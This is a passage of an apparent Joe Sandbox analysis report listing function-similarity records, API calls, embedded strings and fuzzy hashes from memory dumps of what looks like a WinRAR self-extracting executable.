                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                  • Instruction ID: f6f787464ad0f975dedbe2f7c61debbbdc3c2b8a77d8e54041cdfd4060284aeb
                                                                                  • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                  • Instruction Fuzzy Hash: FA312BB2A186814BF708EE6AD56067EF7D0FB44740F488139DF4683782DA7CE446C710
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                                                  • Instruction ID: a4a17cf83e89b24115ab270ea1249096ef3a70b18c57beb487b9c5f603deafae
                                                                                  • Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                                                  • Instruction Fuzzy Hash: C7F0FE61F1C28F42FB6A20B95819B3990569F13318FEC48B5D12FC62C5D9ADECA31139
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                  • Instruction ID: aca75ab8fd115aa987067c040c480a25e08611e077818bd4c3a959f8219d5056
                                                                                  • Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                  • Instruction Fuzzy Hash: 79A002A190CC43D0F694AB90E960870A730FF64300BD810B5F04D410A4DF3CA803C330
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                                  • API String ID: 3668304517-727060406
                                                                                  • Opcode ID: 68b0776e0b0472d89a3e33afb210e6886cf7e268cb4df9669c3e10123b671312
                                                                                  • Instruction ID: 2d0264b6b75d8f44e249538a22cb4b501c628202cb09205a187013151f202386
                                                                                  • Opcode Fuzzy Hash: 68b0776e0b0472d89a3e33afb210e6886cf7e268cb4df9669c3e10123b671312
                                                                                  • Instruction Fuzzy Hash: EE41E836B05F4199FB01ABA0D4807ED73A5EF58798F84017ADA5C13B58EE39D156C3A0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                  • API String ID: 2565136772-3242537097
                                                                                  • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                  • Instruction ID: d277ba4a4d863da16e3348c4a2c88d00741a35721d0979a0d37ded912eeb41a9
                                                                                  • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                  • Instruction Fuzzy Hash: F221F174E19A0381FA95BBD1E855D74A7A0FF58780FCC40B9D94E066A0EE3DA54BC370
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                  • String ID: DXGIDebug.dll$UNC$\\?\
                                                                                  • API String ID: 4097890229-4048004291
                                                                                  • Opcode ID: 790c86bd1d63f4eca2282328e285cd4af49754adb3319a1c484213ed7cda452a
                                                                                  • Instruction ID: 685ae52850447d43731bb7819950c3288da2ed5bb3568d023e66c5d70932cf13
                                                                                  • Opcode Fuzzy Hash: 790c86bd1d63f4eca2282328e285cd4af49754adb3319a1c484213ed7cda452a
                                                                                  • Instruction Fuzzy Hash: DA12E322B09B4684FB10EBA4D4405ADA371EF81B84F984176DA9D07BE9DF3DD94AC360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                  • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                  • API String ID: 431506467-1315819833
                                                                                  • Opcode ID: 2f46cc1a99c1f37a0c478ce60eb93dd31fe2b8eb42b17bb1256e0ee20edd3ce7
                                                                                  • Instruction ID: 46cad345b1dfa2dea42f30334cb96cdb96e4cf13d0546f4e94eac8e43a7828bb
                                                                                  • Opcode Fuzzy Hash: 2f46cc1a99c1f37a0c478ce60eb93dd31fe2b8eb42b17bb1256e0ee20edd3ce7
                                                                                  • Instruction Fuzzy Hash: F2B1C072F1874285FB00ABA4E4546BCA372AF45394F884275EA5C27BD9EE3CE446C350
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                                                  • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                  • API String ID: 2868844859-1533471033
                                                                                  • Opcode ID: 1ea127eca2c18cb8a14940d765cc2bcbd285cf128bafe390cda2fc791a186282
                                                                                  • Instruction ID: 62ce5b6f86b634b360086b6da29e69283e77d1af4112f21cd218882887f18e1d
                                                                                  • Opcode Fuzzy Hash: 1ea127eca2c18cb8a14940d765cc2bcbd285cf128bafe390cda2fc791a186282
                                                                                  • Instruction Fuzzy Hash: DD81B062F18B0295FB01EBE5D8509EDA371AF48784F880576DE1D177A9EE38D50BC360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                  • API String ID: 3215553584-2617248754
                                                                                  • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                  • Instruction ID: 0341f24a7acaaca8c77768000fefa484da30acb7f044a0f48bc0d0a2bf701251
                                                                                  • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                  • Instruction Fuzzy Hash: E841DE72A0AB4188F754DFA4E841BAD73A4EF14394F88417AEE9C03B45DE3DD426C394
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                  • String ID: STATIC
                                                                                  • API String ID: 2845197485-1882779555
                                                                                  • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                  • Instruction ID: c58bbe858ae5c38059a056568e5899e12821373f2d2af48682138fa987944cad
                                                                                  • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                  • Instruction Fuzzy Hash: CB319425B08B4246FA60BB51E564FB9A3A1BF89BC0F884470ED4D07B56DE3DD4078760
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemTextWindow
                                                                                  • String ID: LICENSEDLG
                                                                                  • API String ID: 2478532303-2177901306
                                                                                  • Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                  • Instruction ID: 4b85f8e677debbcee3475bb4b4643ebb948871bda5bfea01320da009119c9f98
                                                                                  • Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                  • Instruction Fuzzy Hash: 5741A535A18A1282F754AB95B814F79A361BF84F80FCC40B5E90E07B95CF3DE54783A0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                  • API String ID: 2915667086-2207617598
                                                                                  • Opcode ID: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                  • Instruction ID: 8526e28247af2665d30c0d16c58b78623283114349039fc5b210f7e574ab325b
                                                                                  • Opcode Fuzzy Hash: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                  • Instruction Fuzzy Hash: 78316360E0DB0682FA14FB95A864975E7A0BF54B90FCC41B9D84E033A4DE3DE9838360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: $
                                                                                  • API String ID: 3668304517-227171996
                                                                                  • Opcode ID: fc3ab499728c373c0b87e4ce79ecf20d3361f502613e825a9cd7664fd32f0bbf
                                                                                  • Instruction ID: 6d979141db1b7026f055b28619b905b31feefcccfd6f93e187fbba6d0f66c44b
                                                                                  • Opcode Fuzzy Hash: fc3ab499728c373c0b87e4ce79ecf20d3361f502613e825a9cd7664fd32f0bbf
                                                                                  • Instruction Fuzzy Hash: 72F1F462F1574640FE00ABA4D4549BDA7A1BF48BA8FC85271EA6D137D5EF7CE082C360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                  • String ID: csm$csm$csm
                                                                                  • API String ID: 2940173790-393685449
                                                                                  • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                  • Instruction ID: ec0ef695a79ad4976fea70b6525263893bdd4abb51c59ed149b0c4919b22a060
                                                                                  • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                  • Instruction Fuzzy Hash: CBE1B072A087828AF790AFA5D480BBDB7A0FF45748F980175DACD57696CF38E486C710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocClearStringVariant
                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                  • API String ID: 1959693985-3505469590
                                                                                  • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                  • Instruction ID: 1eb813b1110a343bce14235fea0d192d65579ff4f3d6c1e3d13deb4a31e96184
                                                                                  • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                  • Instruction Fuzzy Hash: 52713D76A14B0685FB10EF65E8809ADB7B0FF98B98B885176DA4E43B64CF3CD545C320
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF75AAD74F3,?,?,?,00007FF75AAD525E,?,?,?,00007FF75AAD5219), ref: 00007FF75AAD7371
                                                                                  • GetLastError.KERNEL32(?,?,00000000,00007FF75AAD74F3,?,?,?,00007FF75AAD525E,?,?,?,00007FF75AAD5219), ref: 00007FF75AAD737F
                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF75AAD74F3,?,?,?,00007FF75AAD525E,?,?,?,00007FF75AAD5219), ref: 00007FF75AAD73A9
                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00007FF75AAD74F3,?,?,?,00007FF75AAD525E,?,?,?,00007FF75AAD5219), ref: 00007FF75AAD73EF
                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,00007FF75AAD74F3,?,?,?,00007FF75AAD525E,?,?,?,00007FF75AAD5219), ref: 00007FF75AAD73FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                  • String ID: api-ms-
                                                                                  • API String ID: 2559590344-2084034818
                                                                                  • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                  • Instruction ID: 80e43d8d8fa1aac8b9972cecb0dbe7de4b408d35566ef6470970a8fc6cbcec7f
                                                                                  • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                  • Instruction Fuzzy Hash: 9231D221B1AA4281FE97BB96A800975A794FF08BA0F9D4579DD5E17380DF3CE44283A0
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,00007FF75AAD1573,?,?,?,00007FF75AAD192A), ref: 00007FF75AAD162B
                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF75AAD1573,?,?,?,00007FF75AAD192A), ref: 00007FF75AAD1648
                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF75AAD1573,?,?,?,00007FF75AAD192A), ref: 00007FF75AAD1664
                                                                                  Strings
                                                                                  Memory Dump Source
